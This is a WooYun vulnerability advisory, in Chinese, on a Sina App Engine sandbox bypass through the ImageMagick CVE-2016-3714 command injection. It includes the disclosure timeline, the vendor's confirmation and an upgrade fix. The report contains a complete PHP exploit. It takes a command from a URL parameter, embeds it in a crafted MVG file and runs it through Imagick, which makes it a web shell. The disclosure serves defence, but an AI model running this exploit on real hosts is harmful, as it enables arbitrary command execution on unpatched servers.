当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205051

漏洞标题:SAE 沙盒绕过(ImageMagick CVE20163714 应用实例)

相关厂商:新浪

漏洞作者: Ricter

提交时间:2016-05-04 19:48

修复时间:2016-06-22 17:10

公开时间:2016-06-22 17:10

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-08: 厂商已经确认,细节仅向厂商公开
2016-05-18: 细节向核心白帽子及相关领域专家公开
2016-05-28: 细节向普通白帽子公开
2016-06-07: 细节向实习白帽子公开
2016-06-22: 细节向公众公开

简要描述:

SAE 有 ImageMagick,可以利用 CVE-2016-3714 进行沙盒绕过执行任意命令。

详细说明:

漏洞细节:http://pastebin.com/aE4sKnCg
ImageMagick 的命令注入,当然也影响 PHP 的 ImageMagick 库。
Exploit:

<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$command = $command . ">" . SAE_TMP_PATH . "/data";
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;
$path1 = SAE_TMP_PATH . "KKKK.mvg";
$path2 = SAE_TMP_PATH . "KKKK.png";
file_put_contents($path1, $exploit);
$thumb = new Imagick();
$thumb->readImage($path1);
$thumb->writeImage($path2);
$thumb->clear();
$thumb->destroy();
unlink("$path1");
unlink("$path2");
echo file_get_contents(SAE_TMP_PATH . "/data");
?>


很慢,要等一会儿..

漏洞证明:

1.png


2FCA62F8-ACC2-4503-8570-705AE849611C.png


3.png

修复方案:

编译安装新版本 ImageMagick。

版权声明:转载请注明来源 Ricter@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-08 17:00

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无